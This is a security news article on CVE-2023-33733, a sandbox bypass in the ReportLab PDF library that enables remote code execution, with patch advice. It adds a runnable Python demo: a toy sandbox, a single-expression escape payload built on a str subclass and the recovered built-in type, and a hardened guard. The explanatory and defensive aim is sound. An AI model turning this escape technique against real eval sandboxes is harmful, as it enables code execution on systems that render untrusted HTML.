Critical flaw discovered in the ReportLab Toolkit: remote code execution risk
A public exploit for a vulnerability in ReportLab, a library used to generate PDFs from HTML, puts millions of users at risk. A security update is available
A researcher has published a proof-of-concept exploit for a remote code execution (RCE) flaw affecting the ReportLab Toolkit. This Python library, widely used by many projects to convert HTML files to PDF, is downloaded about 3.5 million times a month from PyPI (the Python Package Index). The proof of concept (PoC) for the flaw, tracked as CVE-2023-33733, was posted yesterday on GitHub together with a write-up that explains the technical details of the vulnerability, which increases the likelihood of exploitation in the wild.
Bypass of "rl_safe_eval" and access to dangerous functions
The problem stems from a bypass of the sandbox restrictions enforced by the "rl_safe_eval" function. That function's job is to evaluate expressions found in the input without letting them run arbitrary code; once it is bypassed, an attacker gains access to potentially dangerous Python built-in functions. "rl_safe_eval" was introduced as a safety measure after a similar remote code execution issue was found in 2019, which is why the researcher focused on defeating it.
Creating malicious classes and functions to run arbitrary code
The PoC first obtains the built-in "type" function and uses it to create a new class, "Word", that inherits from "str". Its instances are still strings, so they pass the sandbox's checks, but the class overrides the methods those checks rely on, which lets it request attributes the sandbox is supposed to withhold, such as the "__code__" attribute of a function. Next, "type" is applied to its own result: the sandbox only permits the one-argument form of "type", but the object it returns is the genuine built-in, which accepts three arguments, so the attacker can use the original "type" to create new classes and objects. From there, a malicious function is built from the bytecode of a compiled function; when executed it can perform arbitrary actions. In the researcher's example it runs an OS command that creates a file named "exploited" in the "/tmp/" directory.
Risks associated with the exploit and security recommendations
Because rl_safe_eval evaluates a single expression, the whole exploit has to fit into one expression; the PoC uses a list-comprehension trick to chain its steps, with the comprehension's loop variables standing in for assignments.
Cure53 researcher Elyas Damej warns in his write-up that exploiting CVE-2023-33733 is as simple as embedding malicious code in an HTML file that is then converted to PDF by software built on the ReportLab library. The library's widespread use and the publication of an exploit put many users at risk. Software vendors that depend on the library can reduce supply-chain risk by applying the available security update. Damej told BleepingComputer that the issue was reported to the ReportLab developers as soon as it was discovered and was fixed in version 3.6.13, released on April 27, 2023. The researcher clarified that all earlier versions of the library are affected.
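To make the mechanics of the two preceding sections concrete, the following is an added Python example written for this article; it is not the researcher's PoC and not ReportLab's rl_safe_eval or the fix shipped in 3.6.13. It builds a small, constructed stand-in sandbox (an AST rewrite that routes every attribute read through a guard function, a "type" that only accepts one argument, and a Python-level "pow" wrapper whose "__globals__" lead to this module's "os" import) and then runs a single-expression payload of the shape described above: comprehension clauses bind names, "type(type(1))" recovers the real built-in "type", that builds a "str" subclass ("Word") whose "startswith" lies to the guard, and "getattr" with a "Word" name reaches a forbidden attribute. The hardened guard, which rejects any name that is not exactly "str", is one illustrative fix and is not claimed to be ReportLab's. All identifiers here (toy_safe_eval, naive_guarded_getattr, hardened_guarded_getattr, safe_type, safe_pow, PAYLOAD) are invented for the demo, and the payload calls os.getpid() instead of running a shell command.

```python
import ast
import os  # reachable through safe_pow.__globals__, standing in for the 'os' the PoC reaches


def naive_guarded_getattr(obj, name):
    """Vulnerable guard (constructed for this demo): it trusts the name's own methods."""
    if not isinstance(name, str):          # a str subclass passes this test
        raise TypeError("attribute name must be a string")
    if name.startswith("__"):              # overridable on a subclass instance
        raise ValueError(f"access to {name!r} is blocked")
    return getattr(obj, name)


def hardened_guarded_getattr(obj, name):
    """Illustrative hardening, not ReportLab's fix: accept exactly str, never a subclass."""
    if type(name) is not str:
        raise TypeError("attribute name must be exactly str, not a subclass")
    if name.startswith("__"):
        raise ValueError(f"access to {name!r} is blocked")
    return getattr(obj, name)


def safe_type(obj):
    """Sandbox 'type': one-argument form only, so it cannot build classes itself."""
    return type(obj)


def safe_pow(a, b):
    """Python-level wrapper; its __globals__ is this module's namespace, which holds os."""
    return pow(a, b)


class _RouteAttributesThroughGuard(ast.NodeTransformer):
    """Rewrite `a.b` into `getattr(a, 'b')` so every attribute read hits the guard."""

    def visit_Attribute(self, node):
        self.generic_visit(node)
        call = ast.Call(func=ast.Name(id="getattr", ctx=ast.Load()),
                        args=[node.value, ast.Constant(node.attr)], keywords=[])
        return ast.copy_location(call, node)


def toy_safe_eval(expr, guard):
    """Evaluate one expression with an allow-listed builtins table (toy sandbox)."""
    tree = ast.parse(expr, mode="eval")
    for node in ast.walk(tree):
        if isinstance(node, ast.Name) and node.id.startswith("__"):
            raise ValueError(f"name {node.id!r} is blocked")
    tree = ast.fix_missing_locations(_RouteAttributesThroughGuard().visit(tree))
    builtins = {"getattr": guard, "type": safe_type, "pow": safe_pow,
                "str": str, "int": int, "len": len}
    return eval(compile(tree, "<toy_safe_eval>", "eval"), {"__builtins__": builtins}, {})


# Single-expression payload in the shape the article describes (constructed here):
# comprehension clauses act as assignments, type(type(1)) recovers the real `type`,
# which builds a str subclass whose startswith() lies, and a Python-level builtin's
# __globals__ leads to os. The real PoC runs a shell command; this reads the pid.
PAYLOAD = """[
    getattr(pow, Word('__globals__'))['os'].getpid()
    for real_type in [type(type(1))]
    for Word in [real_type('Word', (str,), {'startswith': lambda self, *args: False})]
][0]"""


def bypass_result():
    """What the payload yields against the naive guard: this interpreter's pid."""
    return toy_safe_eval(PAYLOAD, naive_guarded_getattr)


def direct_pid():
    return os.getpid()


def guard_stops(guard, expr):
    """True if the given guard rejects the expression."""
    try:
        toy_safe_eval(expr, guard)
    except (TypeError, ValueError):
        return True
    return False


if __name__ == "__main__":
    print("naive guard, plain pow.__globals__  :", guard_stops(naive_guarded_getattr, "pow.__globals__"))
    print("naive guard, str-subclass payload   :", bypass_result() == direct_pid())
    print("hardened guard, str-subclass payload:", guard_stops(hardened_guarded_getattr, PAYLOAD))
    print("hardened guard, benign expression   :", toy_safe_eval("'abc'.upper()", hardened_guarded_getattr))
```

The naive guard blocks the obvious "pow.__globals__" but not the same request made through a "Word" instance, because the only check it performs is a method call on an object the attacker controls. Rejecting anything whose type is not exactly "str" closes that class of bypass without breaking benign expressions; note that plain "isinstance(name, str)" is not enough, since it is precisely what admits the subclass.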
06/01/2023 05:50
Marco Verro